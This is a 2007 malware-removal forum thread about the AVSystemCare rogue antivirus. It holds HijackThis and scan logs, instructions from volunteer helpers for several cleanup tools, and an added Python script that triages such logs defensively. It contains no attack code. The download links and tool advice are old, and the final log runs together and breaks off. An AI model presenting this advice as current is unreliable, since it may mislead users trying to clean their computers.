John Posted June 27, 2007 ID:5804

Can't seem to get rid of AVSystemCare. My PC is real sluggish, hopefully related. I've tried Norton AV and Windows Defender but nothing is detected. Followed Symantec's recommendations for deleting keys from my registry but I could not locate most of them. Also ran Registry Mechanic but this did not seem to help.

I'm new to this forum. Sorry, not familiar with HijackThis logs.

John

Root Admin RubbeR DuckY Posted June 27, 2007 ID:5805

John, can you please follow all directions listed here. http://www.malwarebytes.org/forums/index.php?showtopic=1295. Then post your HijackThis log. Thanks!

John Posted June 28, 2007 Author ID:5810

I ran RogueRemover, not sure why 2 of the 4 items were not removed.

Malwarebytes' RogueRemover
Malwarebytes

Root Admin RubbeR DuckY Posted June 28, 2007 ID:5811

First, download the program Hoster to restore the default hosts file back onto your machine.

To do so, download the Hoster program and run it. http://www.funkytoad.com/download/hoster.zip

When it opens, click on the Restore Original Hosts button and then exit Hoster.

Next, open HijackThis and place a checkmark next to the following items.

O2 - BHO: (no name) - {CDEEC43D-3572-4E95-A2A5-F519D29F00C0} - (no file)
O3 - Toolbar: (no name) - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - (no file)
O3 - Toolbar: (no name) - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)

Click Fix Checked.

Next download one of our other utilities called StartUpLite from http://www.malwarebytes.org/startuplite.php. Start it and read each description. Select an option for each item and then click Continue.

Restart your computer and let me know how your computer is running.

John Posted June 28, 2007 Author ID:5820

Went to funkytoad site. No hoster.zip file available. Downloaded HosterXpert and ran program. Got one error: cannot create file c:windows\system32\drivers\ETC\host

Followed your instructions to run HijackThis and fix 3 items, then ran StartUpLite and restarted my computer.

No noticeable difference in performance, but more distressing is I wasn't on-line more than 3 minutes and AVSystemCare screen showed up twice. Captured the following from the screen

therock247uk Posted June 28, 2007 ID:5825

Can you please post a fresh Hijackthis log?

John Posted June 28, 2007 Author ID:5827

Here is my latest Hijackthis log.

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 2:13:57 PM, on 6/28/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\WINDOWS\System32\drivers\CDAC11BA.EXE
C:\WINDOWS\System32\cisvc.exe
C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exe
C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\wanmpsvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\BCMSMMSG.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Common Files\AOL\1154100068\ee\aolsoftware.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\DellSupport\DSAgnt.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe
C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\CA\eTrust PestPatrol\CAPPActiveProtection.exe
C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Microsoft Money\System\urlmap.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Documents and Settings\Dad\Desktop\HiJackThis_v2.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dellnet.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=566...k/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
O1 - Hosts: 66.38.215.115 kazza.com
O1 - Hosts: 66.38.215.115 www.kazza.com
O1 - Hosts: 66.38.215.115 kaza.com
O1 - Hosts: 66.38.215.115 www.kaza.com
O1 - Hosts: 66.38.215.115 kaaza.com
O1 - Hosts: 66.38.215.115 www.kaaza.com
O1 - Hosts: 66.38.215.115 kahza.com
O1 - Hosts: 66.38.215.115 www.kahza.com
O1 - Hosts: 66.38.215.115 edonkey.com
O1 - Hosts: 66.38.215.115 www.edonkey.com
O1 - Hosts: 66.38.215.115 emule.com
O1 - Hosts: 66.38.215.115 www.emule.com
O1 - Hosts: 66.38.215.115 suprnova.com
O1 - Hosts: 66.38.215.115 www.suprnova.com
O1 - Hosts: 64.124.166.37 klite.com
O1 - Hosts: 64.124.166.37 www.klite.com
O1 - Hosts: 64.124.166.37 k-lite.com
O1 - Hosts: 64.124.166.37 kazaalite.com
O1 - Hosts: 64.124.166.37 www.kazzalite.com
O1 - Hosts: 64.124.166.37 kazalite.com
O1 - Hosts: 64.124.166.37 www.kazalite.com
O1 - Hosts: 64.124.166.37 kaazalite.com
O1 - Hosts: 64.124.166.37 www.kaazalite.com
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll
O2 - BHO: CNavExtBho Class - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - C:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll
O4 - HKLM\..\Run: [bCMSMMSG] BCMSMMSG.exe
O4 - HKLM\..\Run: [MoneyStartUp10.0] "C:\Program Files\Microsoft Money\System\Activation.exe"
O4 - HKLM\..\Run: [AdaptecDirectCD] "C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe"
O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exe
O4 - HKLM\..\Run: [AOL Spyware Protection] "C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe"
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /Consumer
O4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1154100068\ee\AOLSoftware.exe
O4 - HKLM\..\Run: [iPHSend] C:\Program Files\Common Files\AOL\IPHSend\IPHSend.exe
O4 - HKLM\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\FirstStart.exe
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [cctray] "C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe"
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit
O4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startup
O4 - HKCU\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: America Online Tray Icon.lnk = C:\Program Files\America Online 9.0\aoltray.exe
O4 - Global Startup: Digital Line Detect.lnk = ?
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dll
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dll
O9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)
O9 - Extra 'Tools' menuitem: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)
O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra 'Tools' menuitem: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyviewer.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {44C1E3A2-B594-401C-B27A-D1B4476E4797} (XTSAC Control) - https://mypc.genxsp.net/XTSAC.cab
O16 - DPF: {56393399-041A-4650-94C7-13DFCB1F4665} (PSFormX Control) - http://www.my-etrust.com/Support/PestScanner/pestscan.cab
O16 - DPF: {6F750200-1362-4815-A476-88533DE61D0C} (Ofoto Upload Manager Class) - http://www.kodakgallery.com/downloads/BUM/..._1/axofupld.cab
O16 - DPF: {7584C670-2274-4EFB-B00B-D6AABA6D3850} (Microsoft RDP Client Control (redist)) - https://mypc.genxsp.net/msrdp.cab
O16 - DPF: {79D6214F-CFCE-480F-9901-27950E78F1E6} (WebCacheCleaner Class) - https://mypc.genxsp.net/MLWebCacheCleaner.cab
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dll
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: AOL Spyware Protection Service (AOLService) - Unknown owner - C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\\aolserv.exe
O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
O23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\System32\drivers\CDAC11BA.EXE
O23 - Service: CaCCProvSP - Unknown owner - C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: CA Pest Patrol Realtime Protection Service (ITMRTSVC) - CA, Inc. - C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exe
O23 - Service: Intel® NMS (NMSSvc) - Intel Corporation - C:\WINDOWS\System32\NMSSvc.exe
O23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: PPCtlPriv - CA, Inc. - C:\Program Files\CA\eTrust PestPatrol\PPCtlPriv.exe
O23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe

--
End of file - 13862 bytes

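An added example, not part of the original thread and not code from Malwarebytes or Trend Micro: a small Python triage pass over HijackThis log lines like those posted above. It lists entries whose target is reported as "(no file)" or "(file missing)", groups O1 Hosts redirections by IP, and checks which CLSIDs from a "Fix Checked" list still appear in a later log. The function names are this example's own, and the sample inputs are a few lines copied from the posts above.

```python
import re
from collections import defaultdict

# Section code ("O2", "R1", ...) followed by " - " and the rest of the entry.
ENTRY_RE = re.compile(r"^(?P<code>[A-Z]\d{1,2}) - (?P<body>.*)$")
# O1 entries have the form "Hosts: <ipv4> <hostname>".
HOSTS_RE = re.compile(r"^Hosts:\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<host>\S+)$")
# CLSID in braces, as used by O2/O3/O9/O16/O22 entries.
CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
ORPHAN_MARKERS = ("(no file)", "(file missing)")
LOCAL_PREFIXES = ("127.", "0.0.0.0")

# Entries the helper asked to have fixed (copied from the thread).
FIXED_ENTRIES = r"""
O2 - BHO: (no name) - {CDEEC43D-3572-4E95-A2A5-F519D29F00C0} - (no file)
O3 - Toolbar: (no name) - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - (no file)
O3 - Toolbar: (no name) - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)
"""

# A few lines copied from the fresh log posted after the fix (not the full log).
SAMPLE_LOG = r"""
Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Running processes:
C:\WINDOWS\Explorer.EXE
O1 - Hosts: 66.38.215.115 kazza.com
O1 - Hosts: 66.38.215.115 www.kazza.com
O1 - Hosts: 64.124.166.37 klite.com
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)
O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
"""


def parse_entries(log_text):
    """Yield (code, body) for each section entry; header and process lines are skipped."""
    for raw in log_text.splitlines():
        match = ENTRY_RE.match(raw.strip())
        if match:
            yield match.group("code"), match.group("body")


def orphaned_entries(log_text):
    """Entries whose registered file is absent: (code, clsid or None, body)."""
    found = []
    for code, body in parse_entries(log_text):
        if body.endswith(ORPHAN_MARKERS):
            clsid = CLSID_RE.search(body)
            found.append((code, clsid.group(0) if clsid else None, body))
    return found


def hosts_redirects(log_text):
    """Map each non-local IP in O1 entries to the hostnames pointed at it."""
    redirects = defaultdict(list)
    for code, body in parse_entries(log_text):
        match = HOSTS_RE.match(body) if code == "O1" else None
        if match and not match.group("ip").startswith(LOCAL_PREFIXES):
            redirects[match.group("ip")].append(match.group("host"))
    return dict(redirects)


def clsids_by_section(log_text):
    """Map upper-cased CLSID -> sorted section codes it appears under."""
    seen = defaultdict(set)
    for code, body in parse_entries(log_text):
        for clsid in CLSID_RE.findall(body):
            seen[clsid.upper()].add(code)
    return {clsid: sorted(codes) for clsid, codes in seen.items()}


def still_present(fixed_text, fresh_text):
    """CLSIDs from the fix list that a later log still references, with sections."""
    fresh = clsids_by_section(fresh_text)
    return {c: fresh[c] for c in clsids_by_section(fixed_text) if c in fresh}


if __name__ == "__main__":
    for code, clsid, body in orphaned_entries(SAMPLE_LOG):
        print("orphaned:", code, clsid)
    for ip, hosts in hosts_redirects(SAMPLE_LOG).items():
        print("hosts redirect:", ip, "<-", ", ".join(hosts))
    for clsid, codes in still_present(FIXED_ENTRIES, SAMPLE_LOG).items():
        print("still referenced after fix:", clsid, "in", ", ".join(codes))
```
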
John Posted June 29, 2007 Author ID:5845

Still hoping someone can help me out with this damn AVSystemCare issue.

therock247uk Posted June 29, 2007 ID:5847
Please download SmitfraudFix (by S!Ri)
Extract the content (a folder named SmitfraudFix) to your Desktop.
Open the SmitfraudFix folder and double-click smitfraudfix.cmd
Select option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).
Please copy/paste the content of that report into your next reply.
Note: process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.
http://www.beyondlogic.org/consulting/proc...processutil.htm
John Posted June 29, 2007 Author ID:5855
I ran smitfraudfix.cmd and my Norton AV reported Malicious Script Detected. I authorized the script to run. DOS screen popped up that said "Process.exe file missing! Unzip all the archive in a folder. Press any key to continue"
John Posted June 29, 2007 Author ID:5857
Downloaded smitfraud again and it ran this time. Here are the results. Do I need to run from desktop of every user of my PC?
SmitFraudFix v2.197
Scan done at 16:20:50.25, Fri 06/29/2007
Run from C:\Documents and Settings\Dad\Desktop\SmitfraudFix\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in normal mode
therock247uk Posted July 1, 2007 ID:5893
Please download ATF Cleaner by Atribune.
This program is for XP and Windows 2000 only
Double-click ATF-Cleaner.exe to run the program.
Under Main choose: Select All
Click the Empty Selected button.
If you use Firefox browser
Click Firefox at the top and choose: Select All
Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click No at the prompt.
If you use Opera browser
Click Opera at the top and choose: Select All
Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click No at the prompt.
Click Exit on the Main menu to close the program.
For Technical Support, double-click the e-mail address located at the bottom of each menu.
Please go HERE to run Panda's ActiveScan
Once you are on the Panda site click the Scan your PC button
A new window will open...click the Check Now button
Enter your Country
Enter your State/Province
Enter your e-mail address and click send
Select either Home User or Company
Click the big Scan Now button
If it wants to install an ActiveX component allow it
It will start downloading the files it requires for the scan (Note: It may take a couple of minutes)
When download is complete, click on My Computer to start the scan
When the scan completes, if anything malicious is detected, click the See Report button, then Save Report and save it to a convenient location. Post the contents of the ActiveScan report
John Posted July 2, 2007 Author ID:5910
Ran ATF Cleaner and then did a Panda scan with results listed below. The Shutdown.Z virus came from Smitfraud which you previously recommended I install??
Incident | Status | Location
Potentially unwanted tool:application/mywebsearch | Not disinfected | hkey_current_user\software\MyWebSearch
Adware:adware/surfaccuracy | Not disinfected | Windows Registry
Potentially unwanted tool:Application/Processor | Not disinfected | C:\Documents and Settings\Dad\Desktop\SmitfraudFix\SmitfraudFix\Process.exe
Virus:Trj/Shutdown.Z | Disinfected | C:\Documents and Settings\Dad\Desktop\SmitfraudFix\SmitfraudFix\restart.exe
Potentially unwanted tool:Application/Processor | Not disinfected | C:\Documents and Settings\Dad\Desktop\SmitfraudFix.zip[smitfraudFix/Process.exe]
Virus:Trj/Shutdown.Z | Disinfected | C:\Documents and Settings\Dad\Desktop\SmitfraudFix.zip[smitfraudFix/restart.exe]
Dialer:Dialer.Gen | Not disinfected | C:\Program Files\dialware\mission\Gamescape_-_Dialware_-_3.exe
Adware:Adware/Comet | Not disinfected | C:\Program Files\Screensavers.com\Installer\bin\siuninst.exe
Spyware:Cookie/Casalemedia | Not disinfected | C:\Program Files\Yahoo!\YPSR\Quarantine\ppq1B.tmp
Spyware:Cookie/QuestionMarket | Not disinfected | C:\Program Files\Yahoo!\YPSR\Quarantine\ppq1D.tmp
Spyware:Cookie/RealMedia | Not disinfected | C:\Program Files\Yahoo!\YPSR\Quarantine\ppq1E.tmp
Spyware:Cookie/Zedo | Not disinfected | C:\Program Files\Yahoo!\YPSR\Quarantine\ppq21.tmp
Spyware:Cookie/Tribalfusion | Not disinfected | C:\Program Files\Yahoo!\YPSR\Quarantine\ppq5.tmp
Spyware:Cookie/RealMedia | Not disinfected | C:\Program Files\Yahoo!\YPSR\Quarantine\ppq6.tmp
Dialer:Dialer.Gen | Not disinfected | C:\WINDOWS\SYSTEM32\Gamescape - Dialware - 3-uninstall.exe
therock247uk Posted July 2, 2007 ID:5923
That's fine, post me a new Hijackthis log and let me know how things are running.
John Posted July 3, 2007 Author ID:5938
My PC is still very sluggish and I'm still getting AVSystemCare screen popping up as well as others like Celldorado.com and generousgenie.com (I have pop up blocker on so I don't understand why this is happening). I'm not getting the sense I've made any progress on my problems?
Here's my latest Hijackthis log:
therock247uk Posted July 3, 2007 ID:5945
Download ComboFix from Here or Here to your Desktop.
Double click combofix.exe and follow the prompts.
When finished, it shall produce a log for you. Post that log and a HiJackthis log in your next reply
Note: Do not mouseclick combofix's window while it's running. That may cause it to stall
John Posted July 4, 2007 Author ID:5964
I have multiple user accounts on my PC. Do I need to run combofix.exe for each account?
Here is the combofix log and an updated Hijackthis log for my user:
Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dllO4 - HKLM\..\Run: [bCMSMMSG] BCMSMMSG.exeO4 - HKLM\..\Run: [MoneyStartUp10.0] "C:\Program Files\Microsoft Money\System\Activation.exe"O4 - HKLM\..\Run: [AdaptecDirectCD] "C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe"O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exeO4 - HKLM\..\Run: [AOL Spyware Protection] "C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe"O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"O4 - HKLM\..\Run: [symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /ConsumerO4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1154100068\ee\AOLSoftware.exeO4 - HKLM\..\Run: [iPHSend] C:\Program Files\Common Files\AOL\IPHSend\IPHSend.exeO4 - HKLM\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\FirstStart.exeO4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startupO4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"O4 - HKLM\..\Run: [cctray] "C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe"O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUPO4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInitO4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startupO4 - HKCU\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeO4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exeO4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /backgroundO4 - HKCU\..\Run: [swg] C:\Program 
